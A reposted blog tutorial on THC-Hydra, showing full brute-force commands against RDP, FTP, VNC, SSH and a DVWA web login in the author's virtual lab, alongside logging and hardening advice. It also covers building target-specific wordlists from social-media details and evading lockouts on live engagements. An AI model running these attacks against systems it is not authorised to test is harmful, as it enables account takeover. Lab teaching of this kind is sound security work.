What is THC-Hydra?
Hydra is a very fast online password cracking
tool, which can perform rapid dictionary attacks against more than 50
Protocols, including Telnet, RDP, SSH, FTP, HTTP, HTTPS, SMB, several databases
and much more. THC (The Hackers Choice) created
Hydra for researchers and security consultants to show how easy it would be to
gain unauthorized access to a system remotely.
Installing THC-Hydra
If you are running Kali Linux you will already
have a version of Hydra installed, for all other Debian based Linux operating
systems download from the repository by using.
sudo apt-get install hydra
or you can download the latest version from
THC’s public GitHub development repository https://github.com/vanhauser-thc/thc-hydra
Start by using git to clone the GitHub
repository.
git clone https://github.com/vanhauser-thc/thc-hydra
next change into the thc-hydra directory.
cd thc-hydra
now just type.
./configure
then…
make
and then.
sudo make install
Hydra-GTK
Hydra GTK is a GUI front end for hydra, as
this is a GUI for hydra you do have to have THC-hydra already installed. I f
you are running Kali Linux this will already be pre-installed for everyone else
you can install it by typing.
sudo apt-get install hydra-gtk
Once installed you will have a new application
called xHydra, open this up and you should see a window that looks like this.
To check out the latest information about
Hydra-GTK project over on their GitHub page https://github.com/vanhauser-thc/thc-hydra/tree/master/hydra-gtk
If you already downloaded hydra from THC’s
GitHub repository you also download the latest version of Hydra-GTK.
Within the thc-hydra folder, you downloaded
from THCs GitHub earlier, you should see a folder called hydra-gtx
cd hydra-gtk/
Before I could compile the source code I had
to have the gtk2.0 dependency installed
sudo apt-get install gtk2.0
Once installed I was able to compile the
source code as normal.
./configure
make
sudo make install
THC-Hydra’s Help File
Once you have Hydra installed, you can check
out its help file by typing hydra -h .
hydra -h
Hydra v8.6-dev (c) 2017 by van Hauser/THC - Please do not use in
military or secret service organizations, or for illegal purposes.
Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C
FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME]
[-f] [-s PORT] [-x MIN:MAX:CHARSET] [-ISOuvVd46]
[service://server[:PORT][/OPT]]
Options:
-R restore a previous
aborted/crashed session
-I ignore an existing
restore file (dont wait 10 seconds)
-S perform an SSL connect
-s PORT if the service is
on a different default port, define it here
-l LOGIN or -L FILE login
with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try
password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET
password bruteforce generation, type "-x -h" to get help
-y disable use of symbols
in bruteforce, see above
-e nsr try "n"
null password, "s" login as pass and/or "r" reversed login
-u loop around users, not
passwords (effective! implied with -x)
-C FILE colon separated
"login:pass" format, instead of -L/-P options
-M FILE list of servers
to attack, one entry per line, ':' to specify port
-o FILE write found
login/password pairs to FILE instead of stdout
-b FORMAT specify the
format for the -o FILE: text(default), json, jsonv1
-f / -F exit when a
login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number
of connects in parallel per target (default: 16)
-T TASKS run TASKS
connects in parallel overall (for -M, default: 64)
-w / -W TIME waittime for
responses (32) / between connects per thread (0)
-4 / -6 use IPv4
(default) / IPv6 addresses (put always in [] also in -M)
-v / -V / -d verbose mode
/ show login+pass for each attempt / debug mode
-O use old SSL v2 and v3
-q do not print messages
about connection errors
-U service module usage
details
server the target: DNS,
IP or 192.168.0.0/24 (this OR the -M option)
service the service to
crack (see below for supported protocols)
OPT some service modules
support additional input (-U for module help)
Supported services: adam6500 asterisk cisco cisco-enable cvs ftp
ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy
http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql
mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] rdp redis
rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5
teamspeak telnet[s] vmauthd vnc xmpp
Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL
v3.0. The newest version is always available at
http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for
illegal purposes.
These services were not compiled in: postgres sapr3 firebird afp
ncp ssh sshkey svn oracle mysql5 and regex support.
Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a
proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4://
connect://)
% export
HYDRA_PROXY=connect_and_socks_proxylist.txt (up to 64 entries)
% export
HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
% export
HYDRA_PROXY_HTTP=proxylist.txt (up to 64 entries)
Examples:
hydra -l user -P
passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p
defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6
pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p
password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P
pws.txt -M targets.txt ssh
Brute Force \Dictionary Attack
Hydra can use either a dictionary based
attack, where you give Hydra an explicit list of words for it to try or a brute
Force attack which will try every single possible combination of letters each
one has its benefits and drawbacks.
Dictionary Attack will use a precompiled list of words or
word list, this will speed up the cracking process over brute force because the
program will only run through each word in the wordlist but if the word is not
in said word list your attack will fail.
If you are running Kali you will already have
a whole bunch of word lists for you to use, just type locate wordlist in
a terminal to find their location.
For everyone else not running Kali, you can
download some good word lists from SkullSecurity.org password
wiki, look for the rockyou.txt as this is what I will be using
in my examples below.
If this was a targeted attack against someone
you could use something like CUPP (Common
User Passwords Profiler) to create a wordlist more specific to
the target. It takes birthday, nickname, address, a name of pet, etc. Enter the
details you know or what you can find out via social media and it will create a
wordlist based on your inputs.
Brute Force will crack a password by trying every possible combination
of the password so, for example, it will try aaaa then aaab, aaac, aaae . This
quite considerably increases the time the attack takes but reduces the
likeliness of the attack to fail.
In hydra, you can use the -x to
enable the brute force options. Brute force options have its own help file
which you can get to by typing hydra -x -h.
hydra -x -h
Hydra v8.6-dev (c) 2017 by van Hauser/THC - Please do not use in
military or secret service organizations, or for illegal purposes.
Hydra bruteforce password generation option usage:
-x MIN:MAX:CHARSET
MIN is the
minimum number of characters in the password
MAX is the maximum
number of characters in the password
CHARSET is a specification of the
characters to use in the generation
valid CHARSET values are: 'a' for lowercase letters,
'A' for uppercase letters, '1' for numbers, and for all others,
just add their real representation.
-y
disable the use if the above letters as placeholders
Examples:
-x 3:5:a generate passwords from length 3 to
5 with all lowercase letters
-x 5:8:A1 generate passwords from length 5 to 8
with uppercase and numbers
-x 1:3:/ generate passwords from length 1 to
3 containing only slashes
-x 5:5:/%,.- generate passwords with length 5
which consists only of /%,.-
-x 3:5:aA1 -y generate passwords from length 3 to 5
with a, A and 1 only
The bruteforce mode was made by Jan Dlabal,
http://houbysoft.com/bfg/
RDP
To set the scene I have a Windows 2012 server
with Remote Desktop setup, running in my virtual lab. The virtual machine has
an IP of 192.168.34.16 and one user called administrator.
So lets fire up hydra with our rockyou word
list and run this command
hydra -t 4 -V -f -l administrator -P rockyou.txt
rdp://192.168.34.16
-t 4 This sets the number of tasks that can run parallel
together in this example I have used 4 which will send 4 logins at a time. RDP
does not like too many connections at the same time so try and keep it at a
maximum of 4. It is sometimes worth adding a -w to your command to add a wait
between attempts.
-V – Verbose this shows you which usernames and passwords on screen as it’s working.
-f Quits once you have found a positive Username and Password match.
-l administrator – Use the username administrator to attempt to login.
-P rockyou.txt– This is the word list that we will be pulling passwords from.
rdp://192.168.34.16 – This is the service we want to attack and the IP address.
-V – Verbose this shows you which usernames and passwords on screen as it’s working.
-f Quits once you have found a positive Username and Password match.
-l administrator – Use the username administrator to attempt to login.
-P rockyou.txt– This is the word list that we will be pulling passwords from.
rdp://192.168.34.16 – This is the service we want to attack and the IP address.
You should see each attempt as it tries to
connect to RDP like pictured below, as we have used the -f command hydra will
stop once it has found a positive match.
In Event Viewer on the Windows 2012 server
with RDP enabled you will see lots of Event ID 4625 in the security logs. As
you can see below this gives away a lot of information to the system admin
where the brute force has come from.
If you are the admin of the server who’s RDP
is getting brute forced, you can mitigate this by changing the default port RDP
listens on or if you have a router that allows you to transpose ports this is
probably the better option.
If you’re interested in changing the port RDP
listens on in a Windows PC start by opening the registry editor (Regedit).
Then locate the following registry sub key:
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal
Server\WinStations\RDP-TCP\PortNumber
On the Edit menu, click Modify,
and then click Decimal
Type the new port number, and then click OK
Quit the Registry Editor.
Then Restart the Computer.
Once the computer restarts you will be able to
connect to it using Remote Desktop Connection as normal but you now need to add
a colon (:) then the new port at the end of the address like pictured below.
Another option is to restrict RDP access by
telling the windows firewall which IP’s are allowed to connect to the RDP port
and which are not. I have already done a tutorial on this check that
out here
FTP
Using the same Windows 2012 server I used for
the RDP brute force above I installed the latest version of FileZilla Server,
which can be downloaded from their website https://filezilla-project.org/
I’m not going to go into the ins and outs of
setting up FileZilla server there are plenty of guides for that just google it,
just know that I setup this FTP server for one user called admin with a
password of P@ssw0rd
Then I run this hydra command in the terminal,
notice I have used a capital -L in this command. This specifies a word list
which contains a list of usernames. use a lowercase l if you want to specify a
single username.
hydra -t 5 -V -f -L userlist -P passwordlist ftp://192.168.34.16
-t 5 this sets the number of tasks or logins it will try
simultaneously. I have gone for 5 here but just remember don’t go too high as
it may give you false results.
-V Verbose this will display the login and password it tries in the terminal for each attempt/
-f Quits once hydra has found a positive Username and Password match.
-L userlist The capital -L here means I’m using a wordlist of usernames called userlist if a -l was used this specifies a single username to try.
-P passwordlist The capital -P here means I’m using a word list called passwordlist if a -p was used this specifies a single password to try.
ftp://192.168.34.16 This is the service we want to attack and the IP address of the FTP server
-V Verbose this will display the login and password it tries in the terminal for each attempt/
-f Quits once hydra has found a positive Username and Password match.
-L userlist The capital -L here means I’m using a wordlist of usernames called userlist if a -l was used this specifies a single username to try.
-P passwordlist The capital -P here means I’m using a word list called passwordlist if a -p was used this specifies a single password to try.
ftp://192.168.34.16 This is the service we want to attack and the IP address of the FTP server
You will see each attempt as it try’s all the
specified username and password combinations until it either finds a match or
it or runs out of combinations.
As you can see below every attempt is logged
in the FileZilla console you can also see all 5 login tasks running at the
bottom simultaneously.
.
Within FileZilla, you can enable auto ban to
stop a hacker brute forcing the username and password of the FTP. When enabled
this blocks the IP address which the hacker is using to login from after a
specified amount of failed logins, the default is 10.
Interestingly hydra just continued to try
passwords even though my IP was banned it went through the whole username and
password list and said nothing in the list matched even though I know the
username and password were on that list.
VNC
I have installed VNC server on the Linux mint
box on 192.168.100.155 running in my virtual lab then added a password
of P@ssw0rd to the VNC server, I have a quick run down on how to set
this up in Mint below.
apt-get install vnc4server
vncpasswd
Password:P@ssw0rd
Verify:P@ssword
vncserver
In the past, VNC has been a very insecure
program due to having no login name and any password could be set and it does
not have to meet any complexity requirements that being said in the newer
versions they have added a blacklist feature that will block you after 5 failed
login attempts.
So for our brute force to work, I have had to
switch off the blacklisting feature by running this command on the Linux Mint
box.
vncconfig -display :1 -set BlacklistTimeout=0 -set
BlacklistThreshold=1000000
This will stop me from blacklisting myself in
my test lab, on a live engagement I would suggest increasing the wait time per
try in hydra (-W ) to anything over 60 and if you are attacking an older
version of VNC this blacklisting feature is not enabled by default.
Also as a little side note don’t use more than
4 tasks (-t 4) in your command as you may find it gives you some false
negatives and remember there is no username on VNC connections so we won’t need
the -l in our command.
After you have turned off the blacklisting
feature run this command in hydra.
hydra -P passwordlist -t 1 -w 5 -f -s 5901 192.168.100.155 vnc
-v
-P passwordlist The capital -P here means I’m using a word list
called passwordlist if a -p was used this specifies a single password to try.
-t 1 This sets the number of tasks or logins it will try simultaneously. I have gone for 1 here but just remember don’t go higher than 4 for brute forcing VNC.
-w 5 This sets the wait time between tries I have gone for 5 here but remember to go a lot higher if the blacklisting feature is still enabled
-f Quits once hydra has found a positive Password match.
-s 5901 This changes the default port for hydra to connect to the VNC server from 5900 to 5901 which was what my VNC server defaulted to.
192.168.100.155 vnc This specifies the IP address of the VNC server and the service we want to attack.
-v Verbose this will display the password it tries in the terminal for each attempt.
-t 1 This sets the number of tasks or logins it will try simultaneously. I have gone for 1 here but just remember don’t go higher than 4 for brute forcing VNC.
-w 5 This sets the wait time between tries I have gone for 5 here but remember to go a lot higher if the blacklisting feature is still enabled
-f Quits once hydra has found a positive Password match.
-s 5901 This changes the default port for hydra to connect to the VNC server from 5900 to 5901 which was what my VNC server defaulted to.
192.168.100.155 vnc This specifies the IP address of the VNC server and the service we want to attack.
-v Verbose this will display the password it tries in the terminal for each attempt.
Once the command is run you should see an
output like this.
As I said above VNC passwords are notably
weak. you should never run a VNC server directly over the internet The
blacklist time-out feature prevents some brute forcing of the passwords but if
you hit the server slow enough not to get blacklisted it can still be
brute-forced.
Instead, you should run VNC server on
127.0.0.1 by adding -localhost to the command line:
vncserver -localhost
then use SSH tunnelling to link a port on your
machine to the port on the server.
ssh -L 5901:localhost:5901 user@<ServerIP>
Then while that SSH connection is alive, you
can connect your VNC client to the port 5901 on your machine.
If you want more information about SSH
tunnelling check out my tutorial all about SSH here
Just before I finish up with brute forcing VNC
you can find the VNC logs in a hidden folder called .vnc in your home folder.
The contents of this log will look something like the text below points 1: and 2: you
can see hydra trying the wrong password and point 3: is where
the password was correct, interestingly it does not seem to give the IP address
of the pc I am using to brute force it.
1:SConnection: Client
needs protocol version 3.7
SConnection: Client
requests security type VncAuth(2)
SConnection:
AuthFailureException: Authentication failure
Connections: closed:
0.0.0.0::40744 (Authentication failure)
2: Connections:
accepted: 0.0.0.0::40746
SConnection: Client needs
protocol version 3.7
SConnection: Client
requests security type VncAuth(2)
SConnection:
AuthFailureException: Authentication failure
Connections: closed:
0.0.0.0::40746 (Authentication failure)
3: Connections:
accepted: 0.0.0.0::40748
SConnection: Client needs
protocol version 3.7
SConnection: Client
requests security type VncAuth(2)
VNCSConnST: Server
default pixel format depth 16 (16bpp) little-endian rgb565
Connections: closed:
0.0.0.0::40748 (Clean disconnection)
SMsgWriter: framebuffer
updates 0
SMsgWriter: raw bytes
equivalent 0, compression ratio -nan
SSH
To set the scene here I have got Linux Mint
running in my virtual lab on 192,168.100.155 with SSH installed, On the Linux
Mint box, I created a user called admin with a password of P@ssword.
I have already done a tutorial on setting up
Linux Mint in Virtual Box here
also I have a guide on installing SSH in Linux
check out this tutorial here
Ok, so now we have our virtual machine with
SSH running on it. we can use this command in Hydra to start brute forcing the
SSH login.
hydra -l admin -P passwordlist ssh://192.168.100.155 -V
-l admin The small l here states that I am going to specify a
username use a capital L if you are going to specify a user list.
-P passwordlist The capital P here says I’m going to be specifying a list of passwords in a file called passwordlist.
ssh://192.168.100.155 This is the service we want to attack and the IP address of the SSH server.
-V Verbose this will display the login and password it tries in the terminal for each attempt.
-P passwordlist The capital P here says I’m going to be specifying a list of passwords in a file called passwordlist.
ssh://192.168.100.155 This is the service we want to attack and the IP address of the SSH server.
-V Verbose this will display the login and password it tries in the terminal for each attempt.
Once you run this command you should see all
the attempts in the terminal like pictured below, notice where I have not added
-t in the command the number of simultaneous logins will be 16 which is the
default.
If you are interested, SSH logs access
attempts in the /var/log/auth.log
To make this log a bit easier on the eyes you
can use the Linux tail command to display the last x number of lines of your
auth.log.
Use the following command to view 100 last
lines of your SSH log.
tail -100 /var/log/auth.log | grep 'sshd'
To stop someone from brute forcing your SSH
password you can turn off Password authentication altogether and enable SSH key
authentication. If you are interested in setting up SSH key authentication
check out my tutorial on SSH.
Webpage Login
Now, this is where things start to get fun,
you can use hydra to brute force webpage logins. To get this to work you need
to get some information about the login page like if its a post or a get
request before you can construct your command in hydra.
The website login I am going to brute force is
the DVWA (Damn Vulnerable Web App) which if you have already taken a look at my
tutorial on Setting up a
Vulnerable LAMP Server will already have setup and will be
ready to go.
Also, you are going to need to have installed
some sort of proxy to capture and identify the key parameters of the web login
page so we can create our command in hydra. I will be using the Firefox plugin
called Tamper Data but you can just as easily use Burp Suite.
The Tamper Data Firefox plugin can be
downloaded from https://addons.mozilla.org/en-GB/firefox/addon/tamper-data/
So to start, open up DVWA website in your
browser “in my lab I go to http://192.168.100.155/dvwa” and login to the DVWA
site with the default credentials of admin /password
You can brute force this main login page but it’s a little bit
more advanced than what I want to get into here.
Once logged in, go down to DVWA Security
button on the left-hand side of the page and make sure the security Level is
set to low.
Once the security is set to low click the
Brute Force button on the menu on the left-hand side.
This is the login page we are going to brute
force.
Start by firing up Tamper Data, I normally do
this in Firefox by hitting the alt key on the keyboard and selecting it from
the Tools menu.
Now Tamper Data is open click Start Tamper and
it will proxy all your Firefox traffic through Tamper Data allowing us to
capture the login request.
Now go back to DVWA and enter any old username
and password and click Login. Tamper Data will capture the login request and
ask you if you want to tamper with it, just click submit.
Go back to Tamper Data and right click the
first GET request captured and click copy.
Next, Open up any text editor and paste every
thing that we copied from Tamper Data this should look something like this
We have now just got to take note of the
message that the DVWA website spits back at us to tell us we have entered a
wrong username and password.
We now have everything to construct our hydra
command against this login page.
The command should look something like this
below notice that all this information was gathered from Tamper Data and the
only part that will be different on yours is the part after PHPSESSID=.
hydra 192.168.100.155 -V -l admin -P passwordlist http-get-form
"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=Username
and/or password incorrect.:H=Cookie: PHPSESSID=rjevaetqb3dqbj1ph3nmjchel2;
security=low"
192.168.100.155 The target IP address of the server
hosting the webpage
-V Verbose this will display the login and password it tries in the terminal for each attempt.
-l admin The small l here states that I am going to specify a username use a capital L if you are going to specify a user list.
-P passwordlist The capital P here says I’m going to be specifying a list of passwords in a file called passwordlist.
http-get-form Tells hydra that you are going to be using the http-get-form module.
/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login All these details were found in our tamper data request that we copied to our text editor.
F=Username and/or password incorrect. This is the failed login message we received from the DVWA login page, this tells hydra when it’s not received we have a valid login.
H=Cookie: PHPSESSID=rjevaetqb3dqbj1ph3nmjchel2; security=low This is the Cookie we were issued when we logged into the DVWA site at the start also found in the Tamper Data.
-V Verbose this will display the login and password it tries in the terminal for each attempt.
-l admin The small l here states that I am going to specify a username use a capital L if you are going to specify a user list.
-P passwordlist The capital P here says I’m going to be specifying a list of passwords in a file called passwordlist.
http-get-form Tells hydra that you are going to be using the http-get-form module.
/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login All these details were found in our tamper data request that we copied to our text editor.
F=Username and/or password incorrect. This is the failed login message we received from the DVWA login page, this tells hydra when it’s not received we have a valid login.
H=Cookie: PHPSESSID=rjevaetqb3dqbj1ph3nmjchel2; security=low This is the Cookie we were issued when we logged into the DVWA site at the start also found in the Tamper Data.
If you get an error like pictured below, where
it gives you more than one valid password. It means that you have not
constructed the command right and probably just need to check that the syntax
is correct.
Normally it’s either the PHPSESSID is wrong or
the failed logon message is not formatted correctly.
If you want more information on the hydra’s
http-get-form command, take a look at Hydra’s http-get-form help page by
typing hydra http-get-form -U in your terminal.
Help for module http-get-form:
============================================================================
Module http-get-form requires the page and the parameters for
the web form.
By default this module is configured to follow a maximum of 5
redirections in
a row. It always gathers a new cookie from the same URL without
variables
The parameters take three ":" separated values, plus
optional values.
(Note: if you need a colon in the option string as value, escape
it with "\:", but do not escape a "\" with "\\".)
Syntax: <url>:<form parameters>:<condition
string>[:<optional>[:<optional>]
First is the page on the server to GET or POST to (URL).
Second is the POST/GET variables (taken from either the browser,
proxy, etc.
with usernames and passwords being replaced in the
"^USER^" and "^PASS^"
placeholders (FORM PARAMETERS)
Third is the string that it checks for an *invalid* login (by
default)
Invalid condition login check can be preceded by "F=",
successful condition
login check must be preceded by "S=".
This is where most people get it wrong. You have to check the
webapp what a
failed string looks like and put it in this parameter!
The following parameters are optional:
C=/page/uri to define a different page to gather initial cookies
from
(h|H)=My-Hdr\: foo to send a user defined HTTP header with each
request
^USER^ and ^PASS^ can also be put into these headers!
Note: 'h' will add the user-defined header at the end
regardless it's already being sent by Hydra or not.
'H' will replace the value of that header if it exists, by the
one supplied by the user, or add the header at the end
Note that if you are going to put colons (:) in your headers you
should escape them with a backslash (\).
All colons that are not option separators should be escaped (see
the examples above and below).
You can specify a header without escaping the colons, but that
way you will not be able to put colons
in the header value itself, as they will be interpreted by hydra
as option separators.
Examples:
"/login.php:user=^USER^&pass=^PASS^:incorrect"
"/login.php:user=^USER^&pass=^PASS^&colon=colon\:escape:S=authlog=.*success"
"/login.php:user=^USER^&pass=^PASS^&mid=123:authlog=.*failed"
"/:user=^USER&pass=^PASS^:failed:H=Authorization\:
Basic dT1w:H=Cookie\: sessid=aaaa:h=X-User\: ^USER^"
"/exchweb/bin/auth/owaauth.dll:destination=http%3A%2F%2F<target>%2Fexchange&flags=0&username=<domain>%5C^USER^&password=^PASS^&SubmitCreds=x&trusted=0:reason=:C=/exchweb"
That’s all I’m going to do for now on brute
forcing Passwords with THC-Hydra. If there are any more you would like me to
show you or you have some feed back for me please leave a comment below.
Tham Khảo: www.hempstutorials.co.uk
No comments:
Post a Comment